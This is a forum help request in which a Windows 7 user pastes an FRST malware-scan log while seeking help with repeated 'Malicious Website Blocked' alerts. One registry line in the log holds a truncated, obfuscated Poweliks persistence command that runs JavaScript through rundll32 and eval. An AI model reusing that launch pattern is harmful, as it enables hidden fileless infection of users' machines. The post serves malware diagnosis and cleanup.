Jump to content

Many "Malicious Website Blocked" Messages


Recommended Posts

Happy New Year,

 

I have been getting a lot of "Malicious Website Blocked".

 

I have downloaded and executed FRST and have included the content of the FRST.TXT and ADDITION.TXT files.

 

Any and all help will be greatly appreciated.

 

Thanks,

 

Randy

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2015
Ran by Randy (administrator) on RANDY-BEBO on 01-01-2015 17:47:53
Running from C:\Users\Randy\Desktop
Loaded Profile: Randy (Available profiles: Randy & JThakur & VMcGlynn)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Wave Systems Corp.) C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmService.exe
(American Power Conversion Corporation) C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlsdbnt.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSAS10_50.MSSQLSERVER\OLAP\bin\msmdsrv.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\NTRtScan.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(American Power Conversion Corporation) C:\Program Files\APC\APC PowerChute Personal Edition\dataserv.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlpwdnt.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\TmListen.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\HostedAgent\HostedAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdhost.exe
() C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\TmProxy.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service\IntuitUpdateService.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Creative Technology Ltd) C:\Program Files\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe
(Wave Systems Corp.) C:\Program Files\Wave Systems Corp\Services Manager\DocMgr\bin\WavXDocMgr.exe
(Broadcom Corporation) C:\Program Files\Dell\Dell ControlPoint\Security Manager\BcmDeviceAndTaskStatusService.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Client Server Security Agent\PccNTMon.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Creative Technology Ltd) C:\Windows\System32\Ctxfihlp.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\dlpsp.exe
(Creative Technology Ltd) C:\Windows\System32\CTxfispi.exe
(Dell Inc.) C:\Program Files\Dell Printers\Additional Color Laser Software\Updater\dlupdr.exe
() C:\Program Files\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Device Center\ipoint.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Garmin Ltd or its subsidiaries) C:\Program Files\Garmin\Express Tray\ExpressTray.exe
(Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Wave Systems Corp.) C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmNotify.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Garmin Ltd or its subsidiaries) C:\Program Files\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [ATIModeChange] => Ati2mdxx.exe
HKLM\...\Run: [iAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-08-07] (Intel Corporation)
HKLM\...\Run: [VolPanel] => C:\Program Files\Creative\Sound Blaster X-Fi\Volume Panel\VolPanlu.exe [241789 2009-04-09] (Creative Technology Ltd)
HKLM\...\Run: [updReg] => C:\Windows\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)
HKLM\...\Run: [startCCC] => c:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-01-27] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [WavXMgr] => C:\Program Files\Wave Systems Corp\Services Manager\Docmgr\bin\WavXDocMgr.exe [147840 2010-07-21] (Wave Systems Corp.)
HKLM\...\Run: [uSCService] => C:\Program Files\Dell\Dell ControlPoint\Security Manager\BcmDeviceAndTaskStatusService.exe [34232 2010-06-22] (Broadcom Corporation)
HKLM\...\Run: [RemoteControl9] => C:\Program Files\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2009-07-06] (CyberLink Corp.)
HKLM\...\Run: [PDVD9LanguageShortcut] => C:\Program Files\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-04-29] (CyberLink Corp.)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [RoxWatchTray] => C:\Program Files\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-09-04] (Sonic Solutions)
HKLM\...\Run: [OfficeScanNT Monitor] => c:\Program Files\Trend Micro\Client Server Security Agent\pccntmon.exe [1956400 2014-03-18] (Trend Micro Inc.)
HKLM\...\Run: [soundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1314816 2009-04-23] (Analog Devices, Inc.)
HKLM\...\Run: [Display] => C:\Program Files\APC\APC PowerChute Personal Edition\DataCollectionLauncher.exe [271736 2010-09-14] (American Power Conversion Corporation)
HKLM\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [673616 2009-04-07] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [OE] => c:\Program Files\Trend Micro\Client Server Security Agent\TMAS_OE\TMAS_OEMon.exe [492880 2010-08-10] (Trend Micro Inc.)
HKLM\...\Run: [DLPSP] => C:\Program Files\Dell Printers\Additional Color Laser Software\Status Monitor\DLPSP.EXE [886152 2010-06-01] (Dell Inc.)
HKLM\...\Run: [DLUPDR] => C:\Program Files\Dell Printers\Additional Color Laser Software\Updater\DLUPDR.EXE [566680 2010-06-01] (Dell Inc.)
HKLM\...\Run: [DLQLU] => C:\Program Files\Dell Printers\Additional Color Laser Software\Launcher\DLQLU.EXE [1127744 2010-06-01] (Dell Inc.)
HKLM\...\Run: [Desktop Disc Tool] => C:\Program Files\Roxio\oem\Roxio Burn\RoxioBurnLauncher.exe [522736 2010-11-01] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
HKLM\...\Run: [intelliType Pro] => c:\Program Files\Microsoft Device Center\itype.exe [1109072 2012-06-26] (Microsoft Corporation)
HKLM\...\Run: [intelliPoint] => c:\Program Files\Microsoft Device Center\ipoint.exe [1629280 2012-06-26] (Microsoft Corporation)
HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
Winlogon\Notify\GoToAssist: C:\Program Files\Citrix\GoToAssist\514\G2AWinLogon.dll [X]
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil32_15_0_0_246_ActiveX.exe [855216 2014-12-09] (Adobe Systems Incorporated)
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)
Lsa: [Authentication Packages] msv1_0 wvauth
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files\APC\APC PowerChute Personal Edition\Display.exe (American Power Conversion Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell System Manager.lnk
ShortcutTarget: Dell System Manager.lnk -> C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe (Dell Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TdmNotify.lnk
ShortcutTarget: TdmNotify.lnk -> C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmNotify.exe (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [uninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-756768628-1363961526-1356878247-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/USREL/1
HKU\S-1-5-21-756768628-1363961526-1356878247-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USREL/1
SearchScopes: HKLM -> DefaultScope {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL = http://www.bing.com/search?q={searchTerms}&form=DLRDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL = http://www.bing.com/search?q={searchTerms}&form=DLRDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> DefaultScope {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL =
SearchScopes: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> {269CF376-E79D-4EC0-A165-B4AF1E0E7C91} URL =
SearchScopes: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\Program Files\WinZip Courier\wzwmcie.dll (WinZip Computing, S.L.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-756768628-1363961526-1356878247-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {233C1507-6A77-46A4-9443-F871F945D258} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\TmIEPlg.dll (Trend Micro Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:
========
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1205146.dll (Adobe Systems, Inc.)
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension
FF Extension: Trend Micro NSC Firefox Extension - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1084\FirefoxExtension [2014-08-17]

Chrome:
=======
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\39.0.2171.71\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\39.0.2171.71\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\39.0.2171.71\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Java Platform SE 6 U35) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll No File
CHR Plugin: (Windows Live Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw_1168638.dll No File
CHR Plugin: (Windows Activation Technologies) - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
CHR Plugin: (Java Deployment Toolkit 6.0.350.10) - C:\Windows\system32\npdeployJava1.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll No File
CHR Profile: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-07]
CHR Extension: (Google Wallet) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-10]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files\APC\APC PowerChute Personal Edition\dataserv.exe [21880 2010-09-14] (American Power Conversion Corporation)
R2 APC UPS Service; C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe [705912 2010-09-14] (American Power Conversion Corporation)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2011-01-19] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2011-01-19] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 dcpsysmgrsvc; c:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe [388464 2010-08-24] (Dell Inc.)
R2 Garmin Core Update Service; C:\Program Files\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-07-23] (Garmin Ltd or its subsidiaries)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 MsDtsServer100; C:\Program Files\Microsoft SQL Server\100\DTS\Binn\MsDtsSrvr.exe [214880 2011-04-24] (Microsoft Corporation)
R3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [28512 2010-04-03] (Microsoft Corporation)
R2 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [42872672 2011-04-24] (Microsoft Corporation)
R2 MSSQLServerOLAPService; C:\Program Files\Microsoft SQL Server\MSAS10_50.MSSQLSERVER\OLAP\bin\msmdsrv.exe [25768800 2010-04-03] (Microsoft Corporation)
R2 ntrtscan; c:\Program Files\Trend Micro\Client Server Security Agent\ntrtscan.exe [1300440 2014-06-23] (Trend Micro Inc.)
R2 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [1177952 2011-04-24] (Microsoft Corporation)
S3 RoxMediaDB12OEM; C:\Program Files\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxMediaDB12OEM.exe [1116656 2010-09-04] (Sonic Solutions)
S2 RoxWatch12; C:\Program Files\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatch12OEM.exe [219632 2010-09-04] (Sonic Solutions)
S3 SecureStorageService; C:\Program Files\Wave Systems Corp\Secure Storage Manager\SecureStorageService.exe [1032192 2010-02-03] (Wave Systems Corp.) [File not signed]
S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [367456 2011-04-24] (Microsoft Corporation)
R2 svcGenericHost; c:\Program Files\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe [51760 2014-03-31] (Trend Micro Inc.)
S2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1273856 2008-11-12] () [File not signed]
R2 TdmService; C:\Program Files\Wave Systems Corp\Trusted Drive Manager\TdmService.exe [1164648 2010-03-29] (Wave Systems Corp.)
R3 TMBMServer; c:\Program Files\Trend Micro\BM\TMBMSRV.exe [345112 2013-10-23] () [File not signed]
R2 tmlisten; c:\Program Files\Trend Micro\Client Server Security Agent\tmlisten.exe [1487128 2014-07-23] (Trend Micro Inc.)
R3 TmProxy; c:\Program Files\Trend Micro\Client Server Security Agent\TmProxy.exe [693272 2013-10-14] (Trend Micro Inc.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdkmdag; C:\Windows\System32\DRIVERS\atipmdag.sys [5295616 2010-01-28] (ATI Technologies Inc.)
S3 Blfp; C:\Windows\System32\DRIVERS\basp.sys [86016 2010-02-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-30] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation)
S3 MWAC; \??\C:\Windows\system32\drivers\ [0 ] () [File not signed]
R0 PBADRV; C:\Windows\System32\DRIVERS\PBADRV.sys [26608 2008-06-04] (Dell Inc)
S4 RsFx0150; C:\Windows\System32\DRIVERS\RsFx0150.sys [240608 2010-04-03] (Microsoft Corporation)
R3 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [75600 2013-08-29] () [File not signed]
R2 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [263072 2013-09-02] () [File not signed]
R3 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [62704 2013-08-29] () [File not signed]
R2 TmFilter; c:\Program Files\Trend Micro\Client Server Security Agent\TmXPFlt.sys [263968 2013-08-14] (Trend Micro Inc.)
R2 TmPreFilter; c:\Program Files\Trend Micro\Client Server Security Agent\TmPreFlt.sys [36128 2013-08-14] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [90712 2013-01-09] (Trend Micro Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
R2 VSApiNt; c:\Program Files\Trend Micro\Client Server Security Agent\VSApiNt.sys [1517600 2013-08-14] (Trend Micro Inc.)
R2 WavxDMgr; C:\Windows\System32\DRIVERS\WavxDMgr.sys [229888 2010-01-19] (Wave Systems Corp.) [File not signed]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
U3 tmpfw; No ImagePath
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-20 15:55 - 2014-12-20 15:55 - 16448208 _____ (Malwarebytes Corp.) C:\Users\Randy\Downloads\mbar-1.08.2.1001.exe
2014-12-15 21:56 - 2015-01-01 17:47 - 00024391 _____ () C:\Users\Randy\Desktop\FRST.txt
2014-12-15 21:55 - 2015-01-01 17:44 - 00000000 ____D () C:\Users\Randy\Desktop\FRST-OlderVersion

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-01 17:47 - 2014-11-16 11:10 - 00000000 ____D () C:\FRST
2015-01-01 17:44 - 2014-11-16 16:13 - 01114624 _____ (Farbar) C:\Users\Randy\Desktop\FRST.exe
2015-01-01 17:30 - 2011-03-22 18:30 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-01 16:57 - 2012-05-01 09:40 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-01 16:49 - 2011-03-22 18:30 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-01 16:41 - 2009-07-13 23:39 - 00511428 _____ () C:\Windows\setupact.log
2015-01-01 16:40 - 2009-07-13 23:55 - 01806021 _____ () C:\Windows\WindowsUpdate.log
2014-12-30 20:42 - 2014-06-16 19:21 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamswissarmy.sys
2014-12-29 22:32 - 2009-07-13 23:34 - 00014224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-29 22:32 - 2009-07-13 23:34 - 00014224 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-26 20:33 - 2011-11-12 11:52 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-12-26 20:32 - 2011-11-12 11:52 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-12-26 18:47 - 2011-01-30 21:40 - 00000000 _____ () C:\Users\Randy\AppData\Local\WavXMapDrive.bat
2014-12-26 18:36 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-20 15:56 - 2014-11-16 11:32 - 00000000 ____D () C:\Users\Randy\Desktop\mbar
2014-12-20 15:56 - 2014-06-16 19:18 - 00079576 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-14 22:36 - 2011-04-01 15:49 - 00020480 _____ () C:\Users\Randy\Documents\Finance.xlsx
2014-12-14 21:43 - 2011-01-19 18:43 - 00000000 ____D () C:\ProgramData\Sonic
2014-12-14 21:40 - 2012-10-26 12:04 - 00000000 ____D () C:\Users\Randy\Documents\BigbeeCustomSoftware
2014-12-12 17:33 - 2012-11-15 11:52 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-12-09 23:03 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
